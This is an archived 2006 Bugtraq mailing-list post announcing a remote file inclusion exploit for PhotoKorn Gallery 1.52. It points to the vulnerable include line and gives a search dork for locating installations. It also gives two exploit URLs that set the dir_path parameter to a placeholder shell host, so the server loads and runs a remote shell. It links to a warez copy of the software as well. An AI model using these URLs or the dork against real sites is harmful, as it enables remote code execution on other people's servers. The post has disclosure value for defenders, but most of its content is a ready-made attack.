| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 8 Sep 2006 01:23:18 -0000 From: saudi.unix@...mail.com To: bugtraq@...urityfocus.com Subject: PhotoKorn Gallery => 1.52 (dir_path) Remote File Inclusion Exploit #==================================================================== #PhotoKorn Gallery => 1.52 (dir_path) Remote File Inclusion Exploit #==================================================================== # #Critical Level : Dangerous # #By Saudi Hackrz # #================================================================= # #Script Name: PhotoKorn Gallery v 1.52 #Script :) #http://warez.gtasoft.ru/skripts/PhotoKorn.Gallery.(SL).v1.52.PHP.NULL-DGT.zip # #================================================================= #Bug in : cart.inc.php & ext_cats.php # # <<<<<<<< include_once($dir_path."/footer.php"); # #in <<<< includes/cart.inc.php & extras/ext_cats.php & ....... :) #================================================================= # #Dork : photokorn 1.52 # #Exploit : #-------------------------------- # #http://sitename.com/[path]/includes/cart.inc.php?dir_path=http://SHELLURL.COM? #or #http://sitename.com/[path]/extras/ext_cats.php?dir_path=http://SHELLURL.COM? #=============================================================================== #Discoverd By : Saudi Hackrz # #Conatact : Saudi.unix[at]hotmail.com # #GreetZ :All My Frind #www.S3hr.com . www.xp10.com . www.3asfh.net . www.lezr.com .www.king18.org #===============================================================================
Powered by blists - more mailing lists